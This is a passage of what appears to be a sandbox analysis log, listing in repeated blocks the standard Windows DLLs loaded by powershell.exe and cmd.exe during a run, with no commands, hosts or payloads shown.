              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
